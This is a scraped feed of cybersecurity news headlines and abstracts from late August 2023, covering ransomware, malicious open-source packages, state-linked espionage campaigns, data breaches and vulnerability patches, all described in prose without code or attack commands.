September 1, 2023 – Ransomware
Free Decryptor Available for ‘Key Group’ Ransomware Full Text
Abstract
Also known as keygroup777, Key Group is a Russian-speaking cybercrime actor known for selling personally identifiable information (PII) and access to compromised devices, as well as extorting victims for money.Cyware
September 01, 2023 – General
It’s a Zero-day? It’s Malware? No! It’s Username and Password Full Text
Abstract
As cyber threats continue to evolve, adversaries are deploying a range of tools to breach security defenses and compromise sensitive data. Surprisingly, one of the most potent weapons in their arsenal is not malicious code but simply stolen or weak usernames and passwords. This article explores the seriousness of compromised credentials, the challenges they present to security solutions, and the importance of implementing robust measures to protect Active Directory (AD) environments. Additionally, we introduce Silverfort Unified Identity Protection , a comprehensive solution that offers enhanced security for AD environments against the misuse of compromised credentials. The Power of Stolen Credentials: Full Access to Any Resource In the world of cyberattacks, stolen usernames and passwords are a highly effective means of gaining unauthorized access to networks and systems. They grant adversaries an entry point, allowing them subsequent access to sensitive on-prem and cloud resourceThe Hacker News
September 1, 2023 – Breach
Sourcegraph Discloses Data Breach Following Access Token Leak Full Text
Abstract
According to the platform, the admin access token used in the attack was leaked in a July 14 commit that passed internal code analysis tools. The token “had broad privileges to view and modify account information on Sourcegraph.com”.Cyware
September 01, 2023 – Phishing
Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic Full Text
Abstract
The Classiscam scam-as-a-service program has reaped the criminal actors $64.5 million in illicit earnings since its emergence in 2019. "Classiscam campaigns initially started out on classified sites, on which scammers placed fake advertisements and used social engineering techniques to convince users to pay for goods by transferring money to bank cards," Group-IB said in a new report. "Since then, Classiscam campaigns have become highly automated, and can be run on a host of other services, such as online marketplaces and carpooling sites." A majority of victims are based in Europe (62.2%), followed by the Middle East and Africa (18.2%), and the Asia-Pacific (13%). Germany, Poland, Spain, Italy, and Romania accounted for the highest number of fraudulent transactions registered in Classiscam chats. First discovered in 2019, Classiscam is an umbrella term for an operation that encompasses 1,366 distinct groups on Telegram. The activities first targeted RussiThe Hacker News
August 31, 2023 – Attack
Earth Estries Group Targets Government and IT Organizations Full Text
Abstract
A new cyberespionage campaign called Earth Estries has been discovered, targeting governments and organizations in the technology sector. Active since at least 2020, the campaign shows similarities with another APT group called FamousSparrow. It is essential for organizations to track and analyze t ... Read MoreCyware
August 31, 2023 – Malware
SapphireStealer Malware: A Gateway to Espionage and Ransomware Operations Full Text
Abstract
An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants. "Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion," Cisco Talos researcher Edmund Brumaghin said in a report shared with The Hacker News. An entire ecosystem has developed over time that allows both financially motivated and nation-state actors to use services from purveyors of stealer malware to carry out various kinds of attacks. Viewed in that light, such malware not only represents an evolution of the cybercrime-as-a-service (CaaS) model, they also offer other threat actors to monetize the stolen data to distribute ransomware, conduct data theft, and other maliciouThe Hacker News
August 31, 2023 – Criminals
Unmasking Trickbot, One of the World’s Top Cybercrime Gangs Full Text
Abstract
Maksim Sergeevich Galochkin, a member of the Russian cybercrime syndicate Trickbot, has been identified by cybercrime researchers. The identification of Galochkin comes after a comprehensive investigation into leaked data from the Trickbot group.Cyware
August 31, 2023 – Malware
North Korean Hackers Deploy New Malicious Python Packages in PyPI Repository Full Text
Abstract
Three additional rogue Python packages have been discovered in the Package Index (PyPI) repository as part of an ongoing malicious software supply chain campaign called VMConnect , with signs pointing to the involvement of North Korean state-sponsored threat actors. The findings come from ReversingLabs, which detected the packages tablediter, request-plus, and requestspro. First disclosed at the start of the month by the company and Sonatype, VMConnect refers to a collection of Python packages that mimic popular open-source Python tools to download an unknown second-stage malware. The latest tranche is no different, with ReversingLabs noting that the bad actors are disguising their packages and making them appear trustworthy by using typosquatting techniques to impersonate prettytable and requests and confuse developers. The nefarious code within tablediter is designed to run in an endless execution loop in which a remote server is polled periodically to retrieve and executeThe Hacker News
August 31, 2023 – Malware
BadBazaar Espionage Tool Targets Android Users Full Text
Abstract
ESET discovered two active campaigns distributing trojanized Signal and Telegram apps that aim to exfiltrate user data and spy on victims’ communications. They have been spreading the BadBazaar Android spyware. Mitigation includes cautious app selection, avoiding suspicious sources, and maintaining ... Read MoreCyware
August 31, 2023 – General
Numbers Don’t Lie: Exposing the Harsh Truths of Cyberattacks in New Report Full Text
Abstract
How often do cyberattacks happen? How frequently do threat actors target businesses and governments around the world? The BlackBerry® Threat Research and Intelligence Team recently analyzed 90 days of real-world data to answer these questions. Full results are in the latest BlackBerry Global Threat Intelligence Report , but read on for a teaser of several interesting cyber attack statistics. Analyzing Real-World Cyberattacks In their most recent quarterly report, BlackBerry threat researchers analyzed the onslaught of malware-based attacks from December 2022 to February 2023. During that time, BlackBerry's AI-powered endpoint protection solution, detected and blocked a total of 1,578,733 malware-based cyberattacks targeting customers. 90 Days of Cyberattacks Based on analysis of cyberattacks detected and blocked during the 90-day window, the BlackBerry Threat Research and Intelligence Team recorded the following statistics: Total number of malware-based attacks: 1,578,73The Hacker News
August 31, 2023 – Attack
VMConnect Supply Chain Attack Continues, Evidence Points to North Korea Full Text
Abstract
The recently discovered malicious Python packages, such as tablediter, request-plus, and requestspro, are believed to be a continuation of the VMConnect campaign attributed to North Korean threat actors.Cyware
August 31, 2023 – Attack
Earth Estries’ Espionage Campaign Targets Governments and Tech Titans Across Continents Full Text
Abstract
A hacking outfit nicknamed Earth Estries has been attributed to a new, ongoing cyber espionage campaign targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. "The threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyber espionage and illicit activities," Trend Micro researchers Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, and Gilbert Sison said . Active since at least 2020, Earth Estries is said to share tactical overlaps with another nation-state group tracked as FamousSparrow , which was first exposed by ESET in 2021 as exploiting ProxyLogon flaws in Microsoft Exchange Server to penetrate hospitality, government, engineering, and legal sectors. It's worth pointing out that commonalities have also been unearthed between FamousSparrow and UNC4841 , an uncategorized activity cluster held responsible forThe Hacker News
August 31, 2023 – Vulnerabilities
Netgear Releases Patches for Two High-Severity Vulnerabilities Full Text
Abstract
The network hardware giant Netgear has discovered two vulnerabilities affecting one of its router models and its network management software. One of the flaws, tracked as CVE-2023-41183, allows hackers to exploit Netgear’s Orbi 760 routers.Cyware
August 31, 2023 – Breach
Forever 21 Data Breach Leaks Personal Information of Over 539,000 Individuals Full Text
Abstract
Forever 21 experienced a data breach that compromised the personal information, including names and Social Security numbers, of over 539,000 individuals. The breach occurred between January 5, 2023, and March 21, 2023.Cyware
August 31, 2023 – Business
Compliance and Risk Management Startup Hyperproof Raises $40M Full Text
Abstract
Hyperproof, a software-as-a-service risk and compliance management company, today announced that it raised $40 million in a funding round led by Riverwood Capital, with participation from Toba Capital, an early-stage VC firm.Cyware
August 31, 2023 – Breach
National Safety Council Data Leak Impacts Credentials of NASA, Tesla, DoJ, Verizon, and 2000 Other Firms Full Text
Abstract
The National Safety Council has leaked nearly 10,000 emails and passwords of their members, exposing 2000 companies, including governmental organizations and big corporations.Cyware
August 31, 2023 – Education
The Power of Passive OS Fingerprinting for Accurate IoT Device Identification Full Text
Abstract
To effectively safeguard against the risks of IoT sprawl, continuous monitoring, and absolute control are crucial. However, that requires accurate identification of all IoT devices and operating systems (OSes) within the enterprise network.Cyware
August 31, 2023
APT Attacks From ‘Earth Estries’ Hit Governments, Tech Firms Across the Globe Full Text
Abstract
Earth Estries uses advanced techniques such as DLL sideloading and has developed three custom malware tools: Zingdoor, TrillClient, and HemiGate. It has been active since at least 2020 and has similarities with another group called FamousSparrow.Cyware
August 30, 2023 – Solution
GitHub Enterprise Server Gets New Security Capabilities Full Text
Abstract
Now, teams using GitHub Actions can also create their own custom deployment protection rules, to ensure that only “the deployments that pass all quality, security, and manual approval requirements make it to production,” GitHub explained.Cyware
August 30, 2023 – Vulnerabilities
Hackers Can Exploit Windows Container Isolation Framework to Bypass Endpoint Security Full Text
Abstract
New findings show that malicious actors could leverage a sneaky malware detection evasion technique and bypass endpoint security solutions by manipulating the Windows Container Isolation Framework. The findings were presented by Deep Instinct security researcher Daniel Avinoam at the DEF CON security conference held earlier this month. Microsoft's container architecture (and by extension, Windows Sandbox ) uses what's called a dynamically generated image to separate the file system from each container to the host and at the same time avoid duplication of system files. It's nothing but an "operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host," thereby bringing down the overall size for a full OS. "The result is images that contain 'ghost files,' which store no actual data but point to a different volume on the system,"The Hacker News
August 30, 2023 – Disinformation
Russians Impersonate Washington Post and Fox News With Anti-Ukraine Stories Full Text
Abstract
This operation, named Doppelganger, has persevered in its attempts to influence Western opinion despite numerous disruptions by Meta and “continuous scrutiny by platforms and researchers.”Cyware
August 30, 2023 – Malware
MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature Full Text
Abstract
A previously undocumented Android banking trojan dubbed MMRat has been observed targeting mobile users in Southeast Asia since late June 2023 to remotely commandeer the devices and perform financial fraud. "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim's device," Trend Micro said . What makes MMRat stand apart from others of its kind is the use of a customized command-and-control (C2) protocol based on protocol buffers (aka protobuf ) to efficiently transfer large volumes of data from compromised handsets, demonstrating the growing sophistication of Android malware. Possible targets based on the language used in the phishing pages include Indonesia, Vietnam, Singapore, and the Philippines. The entry point of the attacks is a network of phishing sites that mimic officiThe Hacker News
August 30, 2023
Pay Our Ransom Instead of GDPR Fine, Cybercrime Gang Tells Its Targets Full Text
Abstract
The hackers behind Ransomed are probably linked to other data leak websites like BreachForums and Exposed, Flashpot said. Some of these sites have shut down due to money problems or poor management, the researchers said.Cyware
August 30, 2023 – Malware
China-Linked BadBazaar Android Spyware Targeting Signal and Telegram Users Full Text
Abstract
Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF . "Most likely active since July 2020 and since July 2022, respectively, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites representing the malicious apps Signal Plus Messenger and FlyGram," security researcher Lukáš Štefanko said in a new report shared with The Hacker News. Victims have been primarily detected in Germany, Poland, and the U.S., followed by Ukraine, Australia, Brazil, Denmark, Congo-Kinshasa, Hong Kong, Hungary, Lithuania, the Netherlands, Portugal, Singapore, Spain, and Yemen. BadBazaar was first documented by Lookout in November 2022 as targeting the UThe Hacker News
August 30, 2023 – Phishing
AiTM Attacks Evolve: Warns Microsoft Full Text
Abstract
Microsoft is alerting about a rise in AiTM phishing methods within the PhaaS cybercrime model, enabling widespread large-scale phishing campaigns. The primary aim of these attacks is to steal session cookies, allowing malicious actors to gain entry to privileged systems without needing to authentic ... Read MoreCyware
August 30, 2023 – Education
How to Prevent ChatGPT From Stealing Your Content & Traffic Full Text
Abstract
ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools. Now, the latest technology damaging businesses' bottom line is ChatGPT . Not only have ChatGPT, OpenAI, and other LLMs raised ethical issues by training their models on scraped data from across the internet. LLMs are negatively impacting enterprises' web traffic, which can be extremely damaging to business. 3 Risks Presented by LLMs, ChatGPT, & ChatGPT Plugins Among the threats ChatGPT and ChatGPT plugins can pose against online businesses, there are three key risks we will focus on: Content theft (or republishing data without permission from the original source)can hurt the authority, SEO rankings, and perceivedThe Hacker News
August 30, 2023 – Malware
Malicious npm Packages Aim to Target Developers for Source Code Theft Full Text
Abstract
An unknown threat actor is leveraging malicious npm packages to target developers with an aim to steal source code and configuration files from victim machines, a sign of how threats lurk consistently in open-source repositories. "The threat actor behind this campaign has been linked to malicious activity dating back to 2021," software supply chain security firm Checkmarx said in a report shared with The Hacker News. "Since then, they have continuously published malicious packages." The latest report is a continuation of the same campaign that Phylum disclosed at the start of the month in which a number of npm modules were engineered to exfiltrate valuable information to a remote server. The packages, by design, are configured to execute immediately post-installation by means of a postinstall hook defined in the package.json file. It triggers the launch of preinstall.js, which spawns index.js to capture the system metadata as well as harvest source code andThe Hacker News
August 30, 2023 – Vulnerabilities
Alert: Juniper Firewalls, Openfire, and Apache RocketMQ Under Attack from New Exploits Full Text
Abstract
Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports. The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC) became available. The issues , tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847, reside in the J-Web component of Junos OS on Juniper SRX and EX Series. They could be chained by an unauthenticated, network-based attacker to execute arbitrary code on susceptible installations. Patches for the flaw were released on August 17, 2023, a week after which watchTowr Labs published a proof-of-concept (PoC) by combining CVE-2023-36846 and CVE-2023-36845 to execute a PHP file containing malicious shellcode. Currently, there are more than 8,200 JunipThe Hacker News
August 30, 2023 – Vulnerabilities
Critical Vulnerability Alert: VMware Aria Operations Networks at Risk from Remote Attacks Full Text
Abstract
VMware has released software updates to correct two security vulnerabilities in Aria Operations for Networks that could be potentially exploited to bypass authentication and gain remote code execution. The most severe of the flaws is CVE-2023-34039 (CVSS score: 9.8), which relates to a case of authentication bypass arising as a result of a lack of unique cryptographic key generation. "A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI," the company said in an advisory. ProjectDiscovery researchers Harsh Jaiswal and Rahul Maini have been credited with discovering and reporting the issue. The second weakness, CVE-2023-20890 (CVSS score: 7.2), is an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution. CreditedThe Hacker News
August 30, 2023 – Policy and Law
FBI Dismantles QakBot Malware, Frees 700,000 Computers, Seizes $8.6 Million Full Text
Abstract
A coordinated law enforcement effort codenamed Operation Duck Hunt has felled QakBot , a notorious Windows malware family that's estimated to have compromised over 700,000 computers globally and facilitated financial fraud as well as ransomware. To that end, the U.S. Justice Department (DoJ) said the malware is "being deleted from victim computers, preventing it from doing any more harm," adding it seized more than $8.6 million in cryptocurrency in illicit profits. The cross-border exercise involved the participation of France, Germany, Latvia, Romania, the Netherlands, the U.K., and the U.S., alongside technical assistance from cybersecurity company Zscaler. The dismantling has been hailed as "the largest U.S.-led financial and technical disruption of a botnet infrastructure leveraged by cybercriminals." No arrests were announced. QakBot, also known as QBot and Pinkslipbot, started its life as a banking trojan in 2007 before morphing into a general-puThe Hacker News
August 29, 2023 – Breach
Japan’s Cybersecurity Agency Breached by Suspected Chinese Hackers: Report Full Text
Abstract
Suspected Chinese hackers breached Japan’s cybersecurity agency and potentially accessed sensitive data stored on its networks for nine months before being discovered, it was reported on Tuesday.Cyware
August 29, 2023 – Attack
Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom Full Text
Abstract
A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. Mandiant, which is tracking the activity under the name UNC4841 , described the threat actor as "highly responsive to defensive efforts" and capable of actively tweaking their modus operandi to maintain persistent access to targets. "UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda's remediation guidance," the Google-owned threat intelligence firm said in a new technical report published today. Almost a third of the identified affected organizations are government agencies. Interestingly enough, some of the earliest compromisesThe Hacker News
August 29, 2023 – General
Meta Fights Sprawling Chinese ‘Spamouflage’ Operation Full Text
Abstract
The network typically posted praise for China and its Xinjiang province and criticisms of the United States, Western foreign policies, and critics of the Chinese government including journalists and researchers, the Meta report says.Cyware
August 29, 2023 – Malware
DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates Full Text
Abstract
A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate . "The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week. The latest report build onn recent findings from security researcher Igal Lytzki, who detailed a "high volume campaign" that leverages hijacked email threads to trick recipients into downloading the malware. The attack commences with a phishing URL that, when clicked, passes through a traffic direction system ( TDS ) to take the victim to an MSI payload subject to certain conditions. This includes the presence of a refresh header in the HTTP response. Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that acts as a conduit to decrypt and launch DarkGate via a crypteThe Hacker News
August 29, 2023 – Breach
Compromised OpenCart Payment Module Steals Credit Card Information Full Text
Abstract
Attackers are increasingly using backend PHP infections, making it more challenging to detect Magecart infections without access to the compromised website's backend code.Cyware
August 29, 2023 – General
Survey Provides Takeaways for Security Pros to Operationalize their Remediation Life Cycle Full Text
Abstract
Ask any security professional and they'll tell you that remediating risks from various siloed security scanning tools requires a tedious and labor-intensive series of steps focused on deduplication, prioritization, and routing of issues to an appropriate "fixer" somewhere in the organization. This burden on already resource-strapped security teams is an efficiency killer. A new study , commissioned by Seemplicity and conducted by Dark Reading, provides fresh insight into how security pros handle the challenging remediation life cycle from discovery to resolution. The research reveals the obstacles security professionals face when coordinating remediation activities. The data exposes the outcomes — in increased workload and diminished risk posture — that arise from lengthy remediation times, inefficient and uncontrolled manual processes, the lack of managerial visibility and oversight across the risk life cycle. Remediation Process Broken Down to Steps and Time Spent on Each StepThe Hacker News
August 29, 2023 – General
Is the Cybersecurity Community’s Obsession With Compliance Counter-Productive? Full Text
Abstract
Cybersecurity professionals should focus on effectively defending their organizations against common breach types, rather than prioritizing compliance and checking boxes on audit forms.Cyware
August 29, 2023 – Vulnerabilities
Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability Full Text
Abstract
Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack. Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663 . Attack chains involve the exploitation of CVE-2023-3519 , a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could facilitate unauthenticated remote code execution. In one intrusion detected in mid-August 2023, the security flaw is said to have been used to conduct a domain-wide attack, including injecting payloads into legitimate executables such as the Windows Update Agent (wuauclt.exe) and the Windows Management Instrumentation Provider Service (wmiprvse.exe). An analysis of the payload is underway. Other notable aspects include the distribution of obfuscated PowerShell scripts, PHP web shells, and the use of an Estonian service called BlueVPS for malware staging. Sophos said the modus operandiThe Hacker News
August 29, 2023 – Malware
Android Banking Trojan MMRat Carries Out Bank Fraud via Fake App Stores Full Text
Abstract
MMRat uses customized command-and-control protocols and remains undetected on VirusTotal, highlighting its ability to evade detection and exploit large volumes of data transfer.Cyware
August 29, 2023 – Phishing
Phishing-as-a-Service Gets Smarter: Microsoft Sounds Alarm on AiTM Attacks Full Text
Abstract
Microsoft is warning of an increase in adversary-in-the-middle ( AiTM ) phishing techniques, which are being propagated as part of the phishing-as-a-service (PhaaS) cybercrime model. In addition to an uptick in AiTM-capable PhaaS platforms, the tech giant noted that existing phishing services like PerSwaysion are incorporating AiTM capabilities. "This development in the PhaaS ecosystem enables attackers to conduct high-volume phishing campaigns that attempt to circumvent MFA protections at scale," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). Phishing kits with AiTM capabilities work in two ways, one of which concerns the use of reverse proxy servers (i.e., the phishing page) to relay traffic to and from the client and legitimate website and stealthily capture user credentials, two-factor authentication codes, and session cookies. A second method involves synchronous relay servers. "In AiTM through synchronous relay sThe Hacker News
August 29, 2023 – Criminals
Web Control, Crime Patrol or Real Pawns in Cybercrime Full Text
Abstract
A group of young employees in Hyderabad ran a sophisticated scam using VOIP to target unsuspecting people in the U.S. and trick them into buying gift cards, which were then converted into cryptocurrency and Indian Rupees.Cyware
August 28, 2023 – Attack
Attacks on Citrix NetScaler systems linked to ransomware actor Full Text
Abstract
A threat actor believed to be tied to the FIN8 hacking group exploits the CVE-2023-3519 remote code execution flaw to compromise unpatched Citrix NetScaler systems in domain-wide attacks.BleepingComputer
August 28, 2023 – Attack
Signs of Malware Attack Targeting Rust Developers Found on Crates.io Full Text
Abstract
The Rust Foundation was notified and it quickly removed the packages and locked the uploader’s account. GitHub was also notified and took action against the associated account.Cyware
August 28, 2023 – Vulnerabilities
Experts Uncover How Cybercriminals Could Exploit Microsoft Entra ID for Elevated Privilege Full Text
Abstract
Cybersecurity researchers have discovered a case of privilege escalation associated with a Microsoft Entra ID (formerly Azure Active Directory) application by taking advantage of an abandoned reply URL. "An attacker could leverage this abandoned URL to redirect authorization codes to themselves, exchanging the ill-gotten authorization codes for access tokens," Secureworks Counter Threat Unit (CTU) said in a technical report published last week. "The threat actor could then call Power Platform API via a middle-tier service and obtain elevated privileges." Following responsible disclosure on April 5, 2023, the issue was addressed by Microsoft via an update released a day later. Secureworks has also made available an open-source tool that other organizations can use to scan for abandoned reply URLs. Reply URL , also called redirect URI, refers to the location where the authorization server sends the user once the app has been successfully authorized and grantThe Hacker News
August 28, 2023 – Malware
MalDoc in PDFs: Hiding malicious Word docs in PDF files Full Text
Abstract
Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs.BleepingComputer
August 28, 2023 – Privacy
Uncovering a Privacy-Preserving Approach to Machine Learning Full Text
Abstract
In the era of data-driven decision making, businesses are harnessing the power of machine learning (ML) to unlock valuable insights, gain operational efficiencies, and solidify competitive advantage.Cyware
August 28, 2023 – Malware
Developers Beware: Malicious Rust Libraries Caught Transmitting OS Info to Telegram Channel Full Text
Abstract
In yet another sign that developers continue to be targets of software supply chain attacks, a number of malicious packages have been discovered on the Rust programming language's crate registry. The libraries, uploaded between August 14 and 16, 2023, were published by a user named "amaperf," Phylum said in a report published last week. The names of the packages, now taken down, are as follows: postgress, if-cfg, xrvrv, serd, oncecell, lazystatic, and envlogger. It's not clear what the end goal of the campaign was, but the suspicious modules were found to harbor functionalities to capture the operating system information (i.e., Windows, Linux, macOS, or Unknown) and transmit the data to a hard-coded Telegram channel via the messaging platform's API. This suggests that the campaign may have been in its early stages and that the threat actor may have been casting a wide net to compromise as many developer machines as possible to deliver rogue updates with impThe Hacker News
August 28, 2023 – Solution
Microsoft will enable Exchange Extended Protection by default this fall Full Text
Abstract
Microsoft announced today that Windows Extended Protection will be enabled by default on servers running Exchange Server 2019 starting this fall after installing the 2023 H2 Cumulative Update (CU14).BleepingComputer
August 28, 2023 – General
Vendors Training AI With Customer Data Is an Enterprise Risk Full Text
Abstract
Zoom received some flak recently for planning to use customer data to train its machine learning models. The reality, however, is that the video conferencing company is not the first, nor will it be the last, to have similar plans.Cyware
August 28, 2023 – General
Cyberattacks Targeting E-commerce Applications Full Text
Abstract
Cyber attacks on e-commerce applications are a common trend in 2023 as e-commerce businesses become more omnichannel, they build and deploy increasingly more API interfaces, with threat actors constantly exploring more ways to exploit vulnerabilities. This is why regular testing and ongoing monitoring are necessary to fully protect web applications, identifying weaknesses so they can be mitigated quickly. In this article, we will discuss the recent Honda e-commerce platform attack, how it happened, and its impact on the business and its clients. In addition, to the importance of application security testing, we will also discuss the different areas of vulnerability testing and its various phases. Finally, we will provide details on how a long-term preventative solution such as PTaaS can protect e-commerce businesses and the differences between continuous testing (PTaaS) and standard pen testing. The 2023 Honda E-commerce Platform Attack Honda's power equipment, lawn, garden, andThe Hacker News
August 28, 2023 – Phishing
Spain warns of LockBit Locker ransomware phishing attacks Full Text
Abstract
The National Police of Spain is warning of an ongoing 'LockBit Locker' ransomware campaign targeting architecture companies in the country through phishing emails.BleepingComputer
August 28, 2023 – Vulnerabilities
PoC for Unauthenticated RCE on Juniper Networks Firewalls Released Full Text
Abstract
Researchers have released additional details about the recently patched four vulnerabilities affecting Juniper Networks’ SRX firewalls and EX switches that could allow remote code execution (RCE), as well as a proof-of-concept (PoC) exploit.Cyware
August 28, 2023 – Botnet
KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities Full Text
Abstract
An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors. The fact that it's being actively maintained indicates its effectiveness in real-world attacks. KmsdBot was first documented by the web infrastructure and security company in November 2022. It's mainly designed to target private gaming servers and cloud hosting providers, although it has since set its eyes on some Romanian government and Spanish educational sites. The malware is designed to scan random IP addresses for open SSH ports andThe Hacker News
August 28, 2023 – Vulnerabilities
Exploit released for Juniper firewall bugs allowing RCE attacks Full Text
Abstract
Proof-of-concept exploit code has been publicly released for vulnerabilities in Juniper SRX firewalls that, when chained, can allow unauthenticated attackers to gain remote code execution in Juniper's JunOS on unpatched devices.BleepingComputer
August 28, 2023 – Outage
Leaseweb Reports Cloud Disruptions Due to Cyberattack Full Text
Abstract
“The issue had an impact on a specific portion of our cloud-based infrastructure leading to downtime for a small number of cloud customers,” Leaseweb told customers in an email notification.Cyware
August 28, 2023 – Breach
Mom’s Meals discloses data breach impacting 1.2 million people Full Text
Abstract
PurFoods, which conducts business in the U.S. as 'Mom's Meals,' is warning of a data breach after the personal information of 1.2 million customers and employees was stolen in a ransomware attack.BleepingComputer
August 28, 2023 – Denial Of Service
Tor Tweaks Onion Routing Software to Fend Off DDoS Attacks Full Text
Abstract
The updated software now supports a proof-of-work challenge called EquiX. Designed by Tevador, who developed Monero's proof-of-work algorithm, it is "a CPU-friendly client puzzle with fast verification and small solution size (16 bytes).Cyware
August 28, 2023 – General
Four common password mistakes hackers love to exploit Full Text
Abstract
Threat actors take advantage of common password mistakes to breach corporate networks. Learn more from Specops Software on the four most common mistakes and how to strengthen your Active Directory against these risks.BleepingComputer
August 28, 2023 – Breach
Hacking Group Kittensec Claims to ‘Pwn Anything We See’ to Expose Corruption Full Text
Abstract
On July 28, KittenSec claimed in a Telegram post to have hacked multiple Romanian government systems and posted a file containing roughly 36 gigabytes of data, including emails, documents, contracts, and healthcare-related data.Cyware
August 28, 2023 – Government
CISA Touts ‘Tremendous Growth’ in Vulnerability Disclosure Platform Full Text
Abstract
The Vulnerability Disclosure Policy (VDP) Platform has seen “tremendous growth” in onboarding 40 agency programs since its launch in July 2021, the Cybersecurity and Infrastructure Security Agency said Friday in a news release.Cyware
August 27, 2023 – Breach
Rhysida claims ransomware attack on Prospect Medical, threatens to sell data Full Text
Abstract
The Rhysida ransomware gang has claimed responsibility for the massive cyberattack on Prospect Medical Holdings, claiming to have stolen 500,000 social security numbers, corporate documents, and patient records.BleepingComputer
August 27, 2023 – Attack
Lazarus Exploits ManageEngine to Deploy QuiteRAT Full Text
Abstract
The Lazarus group was associated with a new campaign against healthcare entities in Europe and the U.S. In this campaign, the attackers exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to distribute the QuiteRAT malware. The malware has many capabilities similar to MagicRAT, anot ... Read MoreCyware
August 26, 2023 – Ransomware
LockBit 3.0 Ransomware Builder Leak Gives Rise to Hundreds of New Variants Full Text
Abstract
The leak of the LockBit 3.0 ransomware builder last year has led to threat actors abusing the tool to spawn new variants. Russian cybersecurity company Kaspersky said it detected a ransomware intrusion that deployed a version of LockBit but with a markedly different ransom demand procedure. "The attacker behind this incident decided to use a different ransom note with a headline related to a previously unknown group, called NATIONAL HAZARD AGENCY," security researchers Eduardo Ovalle and Francesco Figurelli said . The revamped ransom note directly specified the amount to be paid to obtain the decryption keys, and directed communications to a Tox service and email, unlike the LockBit group, which doesn't mention the amount and uses its own communication and negotiation platform. NATIONAL HAZARD AGENCY is far from the only cybercrime gang to use the leaked LockBit 3.0 builder. Some of the other threat actors known to leverage it include Bl00dy and Buhti . KasperskThe Hacker News
August 26, 2023 – Policy and Law
UnitedHealthcare Fined $80K for Six-Month Records Access Delay Full Text
Abstract
The HHS' Office for Civil Rights said UnitedHealthcare had agreed to settle a case involving potential HIPAA violations related to allegations that the company took six months to fulfill a health plan member's request to access his PHI.Cyware
August 26, 2023 – Breach
Kroll Suffers Data Breach: Employee Falls Victim to SIM Swapping Attack Full Text
Abstract
Risk and financial advisory solutions provider Kroll on Friday disclosed that one of its employees fell victim to a "highly sophisticated" SIM swapping attack. The incident, which took place on August 19, 2023, targeted the employee's T-Mobile account, the company said. "Specifically, T-Mobile, without any authority from or contact with Kroll or its employee, transferred that employee's phone number to the threat actor's phone at their request," it said in an advisory. This enabled the unidentified actor to gain access to certain files containing personal information of bankruptcy claimants in the matters of BlockFi , FTX , and Genesis. SIM swapping (aka SIM splitting or simjacking), while generally a benign process, could be exploited by threat actors to fraudulently activate a SIM card under their control with a victim's phone number. This makes it possible to intercept SMS messages and voice calls and receive MFA-related messages that contThe Hacker News
August 26, 2023 – Malware
The Three Malware Loaders Behind 80% of Incidents Full Text
Abstract
QakBot, SocGholish, and Raspberry Robin are the most prevalent malware loaders causing havoc for security teams, with QakBot being the most versatile and persistent threat.Cyware
August 26, 2023 – Policy and Law
DOJ Charged Tornado Cash Founders With Laundering More Than $1 Billion Full Text
Abstract
The duo operated the Tornado Cash cryptocurrency mixer that facilitated more than $1 billion in money laundering transactions and laundered hundreds of millions of dollars for the Lazarus APT group.Cyware
August 26, 2023 – Criminals
